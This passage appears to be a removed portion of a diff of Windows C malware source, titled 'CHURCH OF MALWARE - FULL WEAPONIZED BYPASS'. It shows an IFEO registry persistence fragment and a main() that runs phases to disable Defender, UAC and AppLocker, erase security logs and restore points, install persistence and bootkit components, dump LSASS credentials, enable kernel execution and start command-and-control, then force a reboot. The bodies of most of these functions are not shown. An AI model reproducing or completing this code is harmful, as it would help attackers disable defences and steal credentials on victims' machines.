REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { - wchar_t debugger[MAX_PATH]; - GetModuleFileNameW(NULL, debugger, MAX_PATH); - RegSetValueExW(hKey, L"Debugger", 0, REG_SZ, (BYTE*)debugger, (DWORD)(wcslen(debugger) * sizeof(wchar_t))); - RegCloseKey(hKey); - wprintf(L"[+] IFEO persistence\n"); - } -} - -// ============================== -// MAIN -// ============================== -int main() { - ElevateSelf(); - wprintf(L"\n[***] CHURCH OF MALWARE - FULL WEAPONIZED BYPASS [***]\n"); - - // Phase 1: Disable core protections - wprintf(L"\n=== PHASE 1: CORE PROTECTIONS ===\n"); - if (DisableTamperProtection()) Sleep(3000); - DisableDefender(); - KillDefenderProcesses(); - DisableUAC(); - DisableAppLockerWDAC(); - - // Phase 2: Anti-forensics - wprintf(L"\n=== PHASE 2: ANTI-FORENSICS ===\n"); - AddDefenderExclusions(); - DisableSecurityLogs(); - DisableSystemRestore(); - DropTelemetryPackets(); - ScrambleMemory(); - - // Phase 3: Persistence - wprintf(L"\n=== PHASE 3: PERSISTENCE ===\n"); - AddPersistence(); - InstallBootkitComponents(); - - // Phase 4: Service elimination - wprintf(L"\n=== PHASE 4: SERVICE ELIMINATION ===\n"); - StopSecurityServices(); - - // Phase 5: Credential access - wprintf(L"\n=== PHASE 5: CREDENTIAL ACCESS ===\n"); - DumpLSASS(); - - // Phase 6: Kernel bypass - wprintf(L"\n=== PHASE 6: KERNEL BYPASS ===\n"); - EnableKernelExecution(); - - // Phase 7: Process protection - wprintf(L"\n=== PHASE 7: PROCESS PROTECTION ===\n"); - RunAsPPL(); - - // Phase 8: C2 activation - wprintf(L"\n=== PHASE 8: C2 ACTIVATION ===\n"); - NetworkC2Setup(); - - wprintf(L"\n[+] ALL PHASES COMPLETE\n"); - wprintf(L"[!] REBOOT REQUIRED\n"); - wprintf(L"[*] Press any key to restart...\n"); - _getch(); - system("shutdown /r /t 5"); - - return 0; -}